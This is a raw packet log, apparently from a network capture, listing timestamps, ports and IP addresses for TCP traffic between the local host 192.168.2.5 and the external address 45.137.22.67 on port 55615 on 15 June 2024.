Jun 15, 2024 20:22:24.708262920 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708309889 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708389044 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708436012 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708465099 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708518028 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708545923 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708574057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708601952 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708628893 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708657980 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708686113 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708714008 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708740950 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708767891 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708796024 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708823919 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708851099 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708878040 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708905935 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708934069 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708961010 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.708988905 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709016085 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709043026 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709069967 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709096909 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709153891 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709194899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709223986 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709250927 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709280014 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709307909 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709336042 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709363937 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709439039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709467888 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709496975 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709523916 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709551096 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709578037 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709604979 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709631920 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709661007 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709687948 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709714890 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709743023 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709769964 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709796906 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709825039 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709851980 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709881067 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709930897 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.709975004 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710002899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710031033 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710058928 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710087061 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710114956 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710141897 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710170031 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710197926 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710226059 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710253954 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710280895 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710309029 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710335970 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710365057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710391998 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710418940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710447073 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710520029 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710549116 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710577011 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710603952 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710632086 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710659027 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710690022 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710736990 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710764885 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710792065 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710819006 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710848093 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710875988 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710902929 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710930109 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710957050 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.710985899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711013079 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711040020 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711066961 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711095095 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711122036 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711148977 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711175919 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711203098 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711230993 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711258888 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711286068 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711314917 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711342096 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711369038 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711400032 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711437941 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711466074 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711494923 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711523056 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711591005 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711622000 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711649895 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711678028 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711704969 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711734056 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711760998 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711788893 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711816072 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711843014 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711869955 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711898088 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711925983 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711952925 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.711981058 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712007999 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712037086 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712064981 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712093115 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712120056 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712177992 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712214947 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712243080 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712270975 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712297916 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712325096 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712352991 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712379932 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712408066 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712435961 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712464094 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712513924 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712542057 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712568998 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712596893 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712672949 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712701082 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712727070 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712754011 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712781906 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712810040 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712836981 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712863922 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712892056 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712920904 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.712975025 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713016033 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713044882 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713073015 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713102102 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713129997 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713157892 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713185072 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713212967 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713241100 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713268042 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713294983 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713321924 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713350058 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713376999 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713403940 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713430882 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713459015 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713486910 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713520050 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713546991 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713574886 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713606119 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713633060 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713660002 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713757038 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713785887 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713799953 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713812113 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713825941 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713840008 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713851929 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713865042 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713879108 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713891983 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713905096 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713917971 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713931084 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713943958 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713956118 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713969946 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713983059 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.713995934 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714009047 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714021921 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714035034 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714047909 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714061022 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714075089 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714087963 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714102030 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714118958 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714132071 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714144945 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714159012 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714173079 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714185953 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714200020 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714212894 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714226007 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714240074 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714252949 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714267015 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714279890 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714293957 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714307070 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714319944 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714334965 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714348078 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714387894 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714401007 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714415073 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714428902 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714442015 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714454889 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714469910 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714488983 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714503050 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714514971 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714529991 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714544058 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714556932 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714570045 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714582920 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714595079 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714607954 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714621067 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714633942 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714648008 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714660883 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714674950 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714689016 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714701891 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714715958 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714729071 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714742899 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714756966 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714768887 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714802027 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714814901 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714828968 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714844942 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:24.714858055 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:25.104408026 CEST	55615	49720	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:25.118736029 CEST	49720	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:26.497710943 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:26.497903109 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:26.503106117 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:26.503145933 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:26.762984037 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:26.763036013 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:26.763072014 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:26.763104916 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:26.763140917 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:26.763160944 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:26.763160944 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:26.805757999 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.538383961 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.538710117 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.543742895 CEST	55615	49718	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.543808937 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.543816090 CEST	49718	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.543880939 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.544279099 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.544435978 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.549145937 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549279928 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.549513102 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549544096 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549575090 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549592018 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.549607992 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549631119 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.549639940 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549685001 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.549724102 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549760103 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.549773932 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.549892902 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.553809881 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.553841114 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.553915024 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.554166079 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.554224014 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.554482937 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.554550886 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.554656029 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.554714918 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.554934978 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.554964066 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.554991007 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.555028915 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.555085897 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.555114031 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.555227995 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.602139950 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.602397919 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.650135994 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.650207043 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.702280045 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.702346087 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.754502058 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.754592896 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.802275896 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.802459955 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.850086927 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.850240946 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.898792028 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.898947001 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.950321913 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.950485945 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:29.998152971 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:29.998224974 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.046298981 CEST	55615	49722	45.137.22.67	192.168.2.5
